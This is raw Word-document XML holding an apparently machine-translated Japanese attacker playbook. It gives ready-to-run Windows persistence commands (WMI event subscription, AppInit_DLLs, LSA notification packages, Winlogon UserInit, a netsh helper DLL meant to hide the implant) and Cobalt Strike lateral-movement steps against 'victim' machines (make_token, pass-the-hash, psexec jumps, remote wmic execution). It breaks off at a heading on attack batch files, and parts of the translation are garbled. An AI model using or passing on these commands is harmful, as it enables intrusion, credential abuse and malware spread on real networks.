    <w:p w14:paraId="4ADF77CB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TargetInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ISA 'Win32_PerfFormattedData_PerfOS_System'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A038F6B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>wmic /名前空間:"\\root\subscription" パス コマンド ライン イベント コンシューマ CREATE Name="永続性", 実行可能パス="C:\users\admin\meter.exe",コマンドライン テンプレート="C:\users\admin\meter.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1F28E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>wmic /NAMESPACE:"\\root\subscription" PATH __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FilterToConsumerBinding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CREATE Filter="__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventFilter.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="persistence"", Consumer="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CommandLineEventConsumer.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="persistence""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E326FF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="055BF6C2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    長所:再起動後も存続し、管理可能な起動間隔。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34161617" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:管理者権限が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A513D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="79EB65AD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppInit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A899DA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> には、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppInit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>を使用してウィンドウアプリケーションにライブラリを埋め込む興味深い方法があります(user32.dllを使用する必要があります)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2331B7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d 0x1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36F412" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d "c:\path\to\meter64.dll" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E5863" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d 0x1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1C5DA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d "c:\path\to\meter32.dll" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A007A6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="775241C5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    さらに、再起動中です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B213EF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    短所: 管理者権限が必要で、管理されていない起動間隔が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB38AEC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="15E54412" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---LSASS---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17713332" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">別の </w:t>
      </w:r>
      <w:r>
        <w:t>オプションは、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>システムプロセスでライブラリを書き込むことです。 このプロセスは、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>ユーティリティで取得したアカウントそのものを保存するため、これは非常に有益な場所です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5B1AB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\system\currentcontrolset\control\lsa" /v "通知パッケージ" /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_multi_sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rassfm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\0scecli\0meter" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DE946" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1D2B21E3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    さらに、再起動中です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABFB3E5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    短所:管理者権限が必要で、起動間隔が管理できず、システムが強制終了される可能性があります。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47651508" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0BE4C0A1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEA977" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ユーザーの 1 人がシステムにログインするたびにシェルが開かれるようにするには、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> メカニズムを使用できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A783749" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d "c:\windows\system32\userinit.exe,c:\windows\meter.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDCB6E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5DA2019E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    さらに、再起動中です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24EF41" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:起動間隔が管理できない。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB56D2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3F3E97B2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---ネッシュ---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E6699" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ネットワーク構成ユーティリティでは、任意のライブラリを読み込むこともできます。 これにより、それを介して即席のスタートアップを整理する可能性が開かれます。 Windowsシステムコンポーネントが最初に呼び出されるため、結果は無害に見えます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2DABD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>#&gt; c:\windows\syswow64\netsh.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E78BA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;ヘルパーC:\ Windows \ meter32を追加します.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="387A38E9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>#&gt; reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\SysWOW64\netsh.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6051B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="6A5EBB11" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">その結果 </w:t>
      </w:r>
      <w:r>
        <w:t>、autorun → netsh.exe → meter.dll というチェーンが得られます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B6858" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 同時に、meter.dllはユーザーの目から隠されます - 彼はWindowsのネイティブコンポーネントである正規の</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>の起動のみを見るでしょう。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351EEAC3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7E20F8CD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    長所:再起動後も存続し、ユーザーが検出するのが困難です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F5D8FE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:管理者権限が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F926050" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0D85C750" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="603C1144" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7B6F494C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="775BE284" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1B0DD02D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>----------------------------------------------------ラテラルムーブメント---------------------------------------------------!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF80950" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="758A4063" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>被害者のPCでユーザーのユーザー名とパスワードを取得できた場合は、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spawnas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Domain \ Admin Password [リスナー]を作成し、新しいエージェントが来て、このユーザーでプロセスが開始されます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D51FC2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="323030D1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 管理者またはユーザーのログイン/パスワードドメインが見つかった場合、彼のトークンを取得でき、コマンドは次のようになります </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD8582" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>make_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Domain\Admin パス</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087C649" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>トークンを引き出したい場合は、次のコマンドを実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CEB451" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>rev2self (英語)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE83A14" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0708E304" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Cobalt Strike--&gt;Visualization--&gt;Target Tableメニューに移動するか、ターゲットアイコンをクリックします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9CA72" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">これは </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、あなたがそれを成し遂げた後にあなたの目標が見つかるところです(net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dclist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">、net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain_controllers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、net computers、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD867E1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> ジャンプ先の PC を右クリックします -- &gt;ジャンプ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816154E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PSExexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="223C20C3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>PSEXEC64 さん</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1A0FE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>PSEXECPSHの</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A2D67" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>の</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABCAF71" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>キー</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A378E3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>の</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11617974" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>winrm64 さん</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D1A93" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="51716586" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>エージェントにシステム・プロセスがある場合は、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> コマンドを使用してシステム特権を昇格できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650A3A5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5EA29BE0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ユーザー名とハッシュが見つかり、ハッシュを復号化できなかった場合は、次のコマンドを作成します </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Domain\Admin hash [command] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42BD4A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(特権権限が必要) 次のコマンドを使用します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E647C59" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">貝 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ディレクトリ \\IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50035293" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ホスト名\c$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83AEFD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>サーバーまたは通常のPCへのアクセス</w:t>
      </w:r>
      <w:r>
        <w:t>を確認します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCF4BB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>アクセス権がある場合は、ファイルブラウザ&gt;セッションをクリックし&gt;パス\\ipまたはアクセス権のあるコンピュータの名前を\c$に書き込み、そこにロードをロードします</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA57516" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">シェルwmic / node:[ip]プロセスコール作成 "rundll32.exe C:\ Temp \ artifact.dll </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StartW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989ADF3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">シェルwmic / node:[ip]プロセスコール作成 "C:\ Temp \ artifact.exe" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E31EE9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3125D678" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="13A17CF5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="354381CB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>！--------------------------------------------------攻撃-------------------------------------------------------------！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D72AD3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>！--。。.BAT--！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92D7F0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">すべて </w:t>
      </w:r>
      <w:r>
        <w:t>は常にアドミニストレータから実行されます。</w:t>
